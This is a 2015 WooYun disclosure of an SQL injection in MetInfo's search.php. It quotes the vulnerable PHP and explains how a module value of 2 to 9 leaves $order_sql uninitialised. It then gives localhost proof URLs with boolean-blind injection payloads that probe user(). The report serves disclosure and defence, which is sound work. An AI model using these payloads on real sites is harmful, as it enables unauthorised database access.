当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121480

漏洞标题:Metinfo最新版一处注入

相关厂商:MetInfo

漏洞作者: 玉林嘎

提交时间:2015-06-18 21:14

修复时间:2015-09-17 08:52

公开时间:2015-09-17 08:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向第三方安全合作伙伴开放
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

rt

详细说明:

metinfo最新版一处注入
漏洞文件:/search/search.php

}else{
	$module=intval($module);
    if($class1)$module=0;
    if(intval($module)){
      $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";
	}else{
	$class1_info=$class_list[$class1];
	if(!$class1_info)okinfo('../',$pagelang[noid]);
	$class1sql=" class1='$class1' ";
	$class2sql=" class2='$class2' ";
	$class3sql=" class3='$class3' ";
	if($_GET['class1re']){
		$class1re = '';
	}
	if($class1&&!$class2&&!$class3){
		foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
			if($val['releclass']==$class1){
				$class1re.=" or class1='$val[id]' ";
			}
		}
		if($class1re){
			$class1sql='('.$class1sql.$class1re.')';
		}
	}
	if($class_list[$class2]['releclass']){
		$class1sql=" class1='$class2' ";
		$class2sql=" class2='$class3' ";
		$class3sql="";
	}
	$serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";
	if($class2&&$class2sql)$serch_sql .= " and $class2sql ";
	if($class3&&$class3sql)$serch_sql .= " and $class3sql "; 
	$order_sql=" order by top_ok desc,com_ok desc,no_order desc,updatetime desc,id desc";
	}
 switch($searchtype){
   default:
   if($searchword<>'')$serch_sql.=" and (title like '%$searchword%' or content like '%$searchword%') ";
   break;
   case 1:
   if($searchword<>'')$serch_sql.=" and title like '%$searchword%' ";
   break;
   case 2:
   if($searchword<>'')$serch_sql.=" and content like '%$searchword%' ";
   break;
  } 
    $module_name=intval($module)?$module:$class1_info[module];
	$module_name=intval($module_name);
	if($module_name<2||$module_name>9)okinfo('javascript:history.back();',$lang_js1);
  	$table_name="met_".$modulename[$module_name][0];
	$table_name=$$table_name;
    $total_count = $db->counter($table_name, "$serch_sql", "*");
    require_once '../include/pager.class.php';
    $page = (int)$page;
	if($page_input){$page=$page_input;}
    $list_num=$met_search_list;
    $rowset = new Pager($total_count,$list_num,$page);
    $from_record = $rowset->_offset();
	$page = $page?$page:1;
    $query = "SELECT * FROM $table_name $serch_sql $order_sql LIMIT $from_record, $list_num";


问题参数 $order_sql 他赋值的位置在

}else{
	$class1_info=$class_list[$class1];
	if(!$class1_info)okinfo('../',$pagelang[noid]);
	$class1sql=" class1='$class1' ";
	$class2sql=" class2='$class2' ";
	$class3sql=" class3='$class3' ";
	if($_GET['class1re']){
		$class1re = '';
	}
	if($class1&&!$class2&&!$class3){
		foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
			if($val['releclass']==$class1){
				$class1re.=" or class1='$val[id]' ";
			}
		}
		if($class1re){
			$class1sql='('.$class1sql.$class1re.')';
		}
	}
	if($class_list[$class2]['releclass']){
		$class1sql=" class1='$class2' ";
		$class2sql=" class2='$class3' ";
		$class3sql="";
	}
	$serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";
	if($class2&&$class2sql)$serch_sql .= " and $class2sql ";
	if($class3&&$class3sql)$serch_sql .= " and $class3sql "; 
	$order_sql=" order by top_ok desc,com_ok desc,no_order desc,updatetime desc,id desc";
	}


那么我们只需不进入这个条件
进入这个

if(intval($module)){
      $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";
	}


module参数 可控 只需在2-9即可

漏洞证明:

http://127.0.0.1/metinfo/search/search.php?class1=&class2=&class3=&searchtype=1&searchword=1&lang=cn&module=5&order_sql=herehere

1111.jpg


http://127.0.0.1/metinfo/search/search.php?class1=&class2=&class3=&searchtype=1&searchword=1&lang=cn&module=5&order_sql= or 1=if(ascii(substr(user(),1,1))=114,1,2)

2222.png


http://127.0.0.1/metinfo/search/search.php?class1=&class2=&class3=&searchtype=1&searchword=1&lang=cn&module=5&order_sql= or 1=if(ascii(substr(user(),1,1))=115,1,2)

33333.jpg


修复方案:

初始化

版权声明:转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-19 08:50

厂商回复:

是系统漏洞,后续版本修复。

最新状态:

暂无